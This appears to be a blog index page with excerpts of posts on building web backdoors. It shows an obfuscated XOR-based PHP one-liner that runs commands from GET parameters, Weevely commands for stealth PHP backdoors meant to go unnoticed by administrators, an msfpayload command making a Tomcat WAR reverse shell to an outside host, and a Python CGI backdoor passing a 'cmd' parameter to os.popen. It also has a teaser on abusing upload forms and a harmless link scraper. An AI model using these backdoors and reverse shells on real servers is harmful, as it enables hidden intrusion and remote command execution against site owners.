Non-alphanumeric PHP Simple Backdoor
After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor. <? $_="{"; #XOR char $_=($_^"<").($_^">").($_^"/"); #XOR = GET ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?> well, it’s a quite simple program, it’s just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result. put the result in one-liner code execution and done. Another version with “<pre>” tag. <? $_="{"; #XOR...
read moreSilent Backdoor with Weevely
Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5, and take a look on the orange char ): root@bt:~# cd /pentest/backdoors/web/weevely root@bt:/pentest/backdoors/web/weevely# ./main.py -g -p bD_p4ss -o bd.php Weevely 0.3 – Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Backdoor file ‘bd.php’ created with password...
read moreCreate a WAR backdoor with Metasploit
Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating the backdoor. dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell_reverse_tcp Length: 71 Options: {“LHOST”=>”172.16.96.1″} [stextbox id="info"]it will create a WAR file contain a random name for jsp backdoor file[/stextbox] 2. Upload the WAR file. 3. Use netcat to...
read moreThe dangerous effect of upload feature
Two days ago, I tried to do some research with web application security. My main focus is targeting the upload feature of a website. Many website today using upload feature to interact with their user, for example on a job searcher website or educational website. From several trials that I’ve done with some website, almost 30% of the website using unsanitized upload feature, and the rest, mostly using a filtering upload feature. I will not go for the unsanitized upload feature, it will be covered automatically. OK lets discuss about using an upload feature arbitrarily. As I said...
read moreCGI Backdoor for Linux with Python
#!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cgi.FieldStorage() cmd = form.getvalue('cmd', '') osexe = os.popen(cmd) dirt = os.getcwd()+'/' prognm = sys.argv[0].strip() progfl = re.findall(dirt+'(.*)',prognm)[0] osinf = os.uname() info='''==================================== CGI python backdoor ==================================== Author : otoy Date : 0x102010 Blog : <a href="http://otoyrood.wordpress.com"...
read moreWeb Links Gatherer (ver 2)
By using Beautiful Soup, we can change the code as seen at the previous post to the code below… and it even works much better… just by changing the regex function, it return a better result : #!/usr/bin/python # otoy -- http://otoyrood.wordpress.com # 0x102010 from urllib import urlopen from BeautifulSoup import BeautifulSoup text = urlopen('http://otoyrood.wordpress.com').read() soup = BeautifulSoup(text) pages = set() for header in soup('a'): pages.add(header['href']) print...
read more